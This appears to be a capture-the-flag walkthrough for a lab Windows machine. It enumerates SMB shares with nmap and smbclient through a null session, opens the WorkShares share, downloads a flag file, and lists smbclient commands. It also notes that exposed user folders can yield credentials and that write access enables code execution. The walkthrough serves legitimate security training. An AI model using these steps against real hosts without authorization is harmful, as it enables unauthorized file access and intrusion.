⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Dancing focuses on SMB (Server Message Block) — the protocol Windows uses for file sharing, printer sharing, and inter-process communication. Misconfigured SMB shares with null or anonymous authentication are among the most common entry points in Windows-heavy environments. This machine teaches you to enumerate shares, identify accessible ones, and extract files without credentials.

Tools: nmap · smbclient  ·  Difficulty: Very Easy  ·  OS: Windows
01 — What You Will Learn
SkillWhy it matters
SMB share enumerationListing available shares is always step one on Windows targets
Null session authenticationConnecting without credentials to probe what's exposed
smbclient navigationThe go-to SMB client on Linux for manual share access
Recursive file listingFinding sensitive files buried in share subdirectories
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 10 microsoft-ds

What you're seeing: ports 135, 139, and 445 are the classic SMB fingerprint on Windows. Port 445 is the primary SMB port (direct TCP, no NetBIOS wrapper). The OS detection confirms Windows 10.

ℹ  Port 139 is NetBIOS over TCP — the older SMB transport. Port 445 is the modern direct-hosted SMB. Most tools default to 445. If 445 is filtered, try 139 as a fallback.
03 — SMB Share Enumeration

List all available shares using a null session (no credentials). The -L flag lists shares, -N suppresses the password prompt.

List shares
smbclient -L 10.129.x.x -N
Output
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC WorkShares Disk
ShareTypeNotes
ADMIN$Default adminMaps to C:\Windows — requires admin credentials
C$Default adminFull drive access — requires admin credentials
IPC$IPCUsed for named pipes and RPC — often allows null sessions for enumeration
WorkSharesCustomNon-default share — always investigate these first
ℹ  Default shares ending in $ are hidden administrative shares. Custom shares without a trailing $ are explicitly created by administrators and are often misconfigured.
04 — Accessing the Share
Connect to WorkShares
smbclient \\\\10.129.x.x\\WorkShares -N
Enumerate the share contents
smb: \> ls . D .. D Amy.J D James.P D smb: \> cd James.P smb: \James.P\> ls flag.txt A 32 smb: \James.P\> get flag.txt smb: \James.P\> exit
Read locally
cat flag.txt
✓ Submit the flag string to complete the machine.
05 — smbclient Command Reference
CommandWhat it does
ls / dirList contents of current directory
cd <dir>Change directory on the remote share
get <file>Download a file to your local current directory
mget *Download all files recursively
put <file>Upload a file (if write access exists)
recurse ONEnable recursive operations
prompt OFFDisable per-file prompts for mget/mput
exit / quitClose the SMB session
06 — Key Takeaways
SMB null sessions and misconfigured share permissions are a top-three finding in almost every internal Windows network assessment. Always enumerate shares before moving on.
ConceptReal-world relevance
Null session enumerationTest every SMB host with -N before attempting authenticated access
Custom shares = soft targetsAdmin-created shares frequently have overly permissive ACLs
User directory exposureFinding user home folders on a share often leads to credentials, SSH keys, or scripts
Lateral movement prepSMB access is a key stepping stone — write access enables PsExec-style code execution